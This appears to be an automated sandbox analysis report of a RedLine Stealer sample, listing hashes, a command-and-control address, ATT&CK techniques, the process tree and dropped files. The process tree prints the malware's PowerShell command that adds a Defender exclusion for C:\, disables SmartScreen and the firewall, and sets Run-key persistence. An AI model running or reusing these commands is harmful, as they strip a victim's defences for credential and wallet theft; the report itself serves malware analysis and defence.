redline | d3d816173bc3f78e89278f938bef7408a249453c31e65018386aa241ee6cbf92

Analysis

max time kernel
42s
max time network
106s
platform
windows7_x64
resource
win7-20220414-en
submitted
07-07-2022 14:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

47645.exe
Size

1.8MB
MD5

30b6d624d18490acfe42a1944c6d3172
SHA1

35402770ba44139f50b5613c274a6b4607be3b16
SHA256

d3d816173bc3f78e89278f938bef7408a249453c31e65018386aa241ee6cbf92
SHA512

42f7b92a99a52c9a229cf09d945d5fcad38a4eecedfe609af6e77d9f5e966b37835a094c5b2121d20e6339fa450c0488af44046f5057e42021a61aae98cf6f4c

Score

10^/10

redline 1327052997 evasion infostealer spyware suricata

Malware Config

Extracted

Family

redline

Botnet

1327052997

37.235.54.26:8362

Signatures

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

powershell.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4" powershell.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4"	powershell.exe

RedLine payload 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/213444-65-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/213444-70-0x000000000041972E-mapping.dmp	family_redline
behavioral1/memory/213444-71-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/213444-72-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

doc.exeDllHost.exeGameInject.exe

pid process

1616 doc.exe
49044 DllHost.exe
213924 GameInject.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

213756 netsh.exe
Drops startup file 1 IoCs

Processes:

DllHost.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk DllHost.exe

pid	process
1616	doc.exe
49044	DllHost.exe
213924	GameInject.exe

pid	process
213756	netsh.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk	DllHost.exe

Loads dropped DLL 10 IoCs

Processes:

47645.exeDllHost.exeWerFault.exeAppLaunch.exe

pid	process
1544	47645.exe
1544	47645.exe
1544	47645.exe
49104
49044	DllHost.exe
213656	WerFault.exe
213656	WerFault.exe
213656	WerFault.exe
213656	WerFault.exe
213444	AppLaunch.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

9 api.ipify.org
10 api.ipify.org
11 api.ipify.org
Suspicious use of SetThreadContext 1 IoCs

Processes:

doc.exe

description pid process target process

PID 1616 set thread context of 213444 1616 doc.exe AppLaunch.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

213656 49044 WerFault.exe DllHost.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

DllHost.exepowershell.exeAppLaunch.exeGameInject.exe

pid process

49044 DllHost.exe
49044 DllHost.exe
213584 powershell.exe
213444 AppLaunch.exe
213444 AppLaunch.exe
213924 GameInject.exe

flow	ioc
9	api.ipify.org
10	api.ipify.org
11	api.ipify.org

description	pid	process	target process
PID 1616 set thread context of 213444	1616	doc.exe	AppLaunch.exe

pid	pid_target	process	target process
213656	49044	WerFault.exe	DllHost.exe

pid	process
49044	DllHost.exe
49044	DllHost.exe
213584	powershell.exe
213444	AppLaunch.exe
213444	AppLaunch.exe
213924	GameInject.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

AppLaunch.exepowershell.exeGameInject.exe

description	pid	process
Token: SeDebugPrivilege	213444	AppLaunch.exe
Token: SeDebugPrivilege	213584	powershell.exe
Token: SeDebugPrivilege	213924	GameInject.exe

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

47645.exedoc.exeDllHost.exepowershell.exeAppLaunch.exe

description	pid	process	target process
PID 1544 wrote to memory of 1616	1544	47645.exe	doc.exe
PID 1544 wrote to memory of 1616	1544	47645.exe	doc.exe
PID 1544 wrote to memory of 1616	1544	47645.exe	doc.exe
PID 1544 wrote to memory of 1616	1544	47645.exe	doc.exe
PID 1544 wrote to memory of 49044	1544	47645.exe	DllHost.exe
PID 1544 wrote to memory of 49044	1544	47645.exe	DllHost.exe
PID 1544 wrote to memory of 49044	1544	47645.exe	DllHost.exe
PID 1544 wrote to memory of 49044	1544	47645.exe	DllHost.exe
PID 1616 wrote to memory of 213444	1616	doc.exe	AppLaunch.exe
PID 1616 wrote to memory of 213444	1616	doc.exe	AppLaunch.exe
PID 1616 wrote to memory of 213444	1616	doc.exe	AppLaunch.exe
PID 1616 wrote to memory of 213444	1616	doc.exe	AppLaunch.exe
PID 1616 wrote to memory of 213444	1616	doc.exe	AppLaunch.exe
PID 1616 wrote to memory of 213444	1616	doc.exe	AppLaunch.exe
PID 1616 wrote to memory of 213444	1616	doc.exe	AppLaunch.exe
PID 1616 wrote to memory of 213444	1616	doc.exe	AppLaunch.exe
PID 1616 wrote to memory of 213444	1616	doc.exe	AppLaunch.exe
PID 49044 wrote to memory of 213584	49044	DllHost.exe	powershell.exe
PID 49044 wrote to memory of 213584	49044	DllHost.exe	powershell.exe
PID 49044 wrote to memory of 213584	49044	DllHost.exe	powershell.exe
PID 49044 wrote to memory of 213656	49044	DllHost.exe	WerFault.exe
PID 49044 wrote to memory of 213656	49044	DllHost.exe	WerFault.exe
PID 49044 wrote to memory of 213656	49044	DllHost.exe	WerFault.exe
PID 213584 wrote to memory of 213756	213584	powershell.exe	netsh.exe
PID 213584 wrote to memory of 213756	213584	powershell.exe	netsh.exe
PID 213584 wrote to memory of 213756	213584	powershell.exe	netsh.exe
PID 213444 wrote to memory of 213924	213444	AppLaunch.exe	GameInject.exe
PID 213444 wrote to memory of 213924	213444	AppLaunch.exe	GameInject.exe
PID 213444 wrote to memory of 213924	213444	AppLaunch.exe	GameInject.exe
PID 213444 wrote to memory of 213924	213444	AppLaunch.exe	GameInject.exe
PID 213444 wrote to memory of 213924	213444	AppLaunch.exe	GameInject.exe
PID 213444 wrote to memory of 213924	213444	AppLaunch.exe	GameInject.exe
PID 213444 wrote to memory of 213924	213444	AppLaunch.exe	GameInject.exe

C:\Users\Admin\AppData\Local\Temp\47645.exe
"C:\Users\Admin\AppData\Local\Temp\47645.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1544

C:\Users\Admin\AppData\Local\Temp\doc.exe
"C:\Users\Admin\AppData\Local\Temp\doc.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1616

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:213444

C:\Users\Admin\AppData\Local\Temp\GameInject.exe
"C:\Users\Admin\AppData\Local\Temp\GameInject.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:213924

C:\Users\Admin\AppData\Local\Temp\DllHost.exe
"C:\Users\Admin\AppData\Local\Temp\DllHost.exe"
2⤵
- Executes dropped EXE
- Drops startup file
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:49044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty вЂ“Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System вЂ“Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty вЂ“Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run вЂ“Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
3⤵
- Modifies security service
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:213584

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
4⤵
- Modifies Windows Firewall
PID:213756

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 49044 -s 1544
3⤵
- Loads dropped DLL
- Program crash
PID:213656

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\DllHost.exe
Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
C:\Users\Admin\AppData\Local\Temp\DllHost.exe
Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
C:\Users\Admin\AppData\Local\Temp\GameInject.exe
Filesize
82KB

MD5
0720a011066bb50774deffd33c5903c8

SHA1
54c4393d7f15192717339ab39be1978127443c79

SHA256
0db9920b4a051c6ee31c6be0ae5d06ff493d85872fead3a906c56e8513fe7da6

SHA512
410e96a4a240245780b9e1939cef06c35ea2192761ca2cfba28add5d7707e9e9ff37d63364389dc729ce42656b60b64e659c460125eb6346d57a2fd1452aa248

Download Submit
C:\Users\Admin\AppData\Local\Temp\GameInject.exe
Filesize
82KB

MD5
0720a011066bb50774deffd33c5903c8

SHA1
54c4393d7f15192717339ab39be1978127443c79

SHA256
0db9920b4a051c6ee31c6be0ae5d06ff493d85872fead3a906c56e8513fe7da6

SHA512
410e96a4a240245780b9e1939cef06c35ea2192761ca2cfba28add5d7707e9e9ff37d63364389dc729ce42656b60b64e659c460125eb6346d57a2fd1452aa248

Download Submit
C:\Users\Admin\AppData\Local\Temp\doc.exe
Filesize
2.4MB

MD5
401cdd939e412e97c9eab5766be869d9

SHA1
e20e78080715f336dd0fc8bb7476d1a4fbc2f7b0

SHA256
7b7964fd2f700fa35f362c4c112d8583feb112310ed9a2ac1fc017efb67ee573

SHA512
266070eb135694cf6bfbfd30868c20381fb7fe16a8c53f41c05a88e8b68baa6fc83823f6806fbd30d56cbf46a7fcada5da0364aebf3a8bbb32fed6abc697167b

Download Submit
\ProgramData\MicrosoftNetwork\System.exe
Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
\Users\Admin\AppData\Local\Temp\DllHost.exe
Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
\Users\Admin\AppData\Local\Temp\DllHost.exe
Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
\Users\Admin\AppData\Local\Temp\DllHost.exe
Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
\Users\Admin\AppData\Local\Temp\DllHost.exe
Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
\Users\Admin\AppData\Local\Temp\DllHost.exe
Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
\Users\Admin\AppData\Local\Temp\DllHost.exe
Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
\Users\Admin\AppData\Local\Temp\GameInject.exe
Filesize
82KB

MD5
0720a011066bb50774deffd33c5903c8

SHA1
54c4393d7f15192717339ab39be1978127443c79

SHA256
0db9920b4a051c6ee31c6be0ae5d06ff493d85872fead3a906c56e8513fe7da6

SHA512
410e96a4a240245780b9e1939cef06c35ea2192761ca2cfba28add5d7707e9e9ff37d63364389dc729ce42656b60b64e659c460125eb6346d57a2fd1452aa248

Download Submit
\Users\Admin\AppData\Local\Temp\doc.exe
Filesize
2.4MB

MD5
401cdd939e412e97c9eab5766be869d9

SHA1
e20e78080715f336dd0fc8bb7476d1a4fbc2f7b0

SHA256
7b7964fd2f700fa35f362c4c112d8583feb112310ed9a2ac1fc017efb67ee573

SHA512
266070eb135694cf6bfbfd30868c20381fb7fe16a8c53f41c05a88e8b68baa6fc83823f6806fbd30d56cbf46a7fcada5da0364aebf3a8bbb32fed6abc697167b

Download Submit
\Users\Admin\AppData\Local\Temp\doc.exe
Filesize
2.4MB

MD5
401cdd939e412e97c9eab5766be869d9

SHA1
e20e78080715f336dd0fc8bb7476d1a4fbc2f7b0

SHA256
7b7964fd2f700fa35f362c4c112d8583feb112310ed9a2ac1fc017efb67ee573

SHA512
266070eb135694cf6bfbfd30868c20381fb7fe16a8c53f41c05a88e8b68baa6fc83823f6806fbd30d56cbf46a7fcada5da0364aebf3a8bbb32fed6abc697167b

Download Submit
memory/1616-56-0x0000000000000000-mapping.dmp

Download
memory/49044-62-0x000007FEFB9A1000-0x000007FEFB9A3000-memory.dmp

Filesize
8KB

Download
memory/49044-59-0x0000000000000000-mapping.dmp

Download
memory/213444-65-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/213444-73-0x0000000075721000-0x0000000075723000-memory.dmp

Filesize
8KB

Download
memory/213444-72-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/213444-71-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/213444-70-0x000000000041972E-mapping.dmp

Download
memory/213444-63-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/213584-86-0x000000001B740000-0x000000001BA3F000-memory.dmp

Filesize
3.0MB

Download
memory/213584-74-0x0000000000000000-mapping.dmp

Download
memory/213584-89-0x00000000028BB000-0x00000000028DA000-memory.dmp

Filesize
124KB

Download
memory/213584-90-0x00000000028B4000-0x00000000028B7000-memory.dmp

Filesize
12KB

Download
memory/213584-91-0x00000000028BB000-0x00000000028DA000-memory.dmp

Filesize
124KB

Download
memory/213584-85-0x00000000028B4000-0x00000000028B7000-memory.dmp

Filesize
12KB

Download
memory/213584-84-0x000007FEF2DA0000-0x000007FEF38FD000-memory.dmp

Filesize
11.4MB

Download
memory/213656-79-0x0000000000000000-mapping.dmp

Download
memory/213756-87-0x0000000000000000-mapping.dmp

Download
memory/213924-93-0x0000000000000000-mapping.dmp

Download
memory/213924-97-0x0000000000190000-0x00000000001AE000-memory.dmp

Filesize
120KB

Download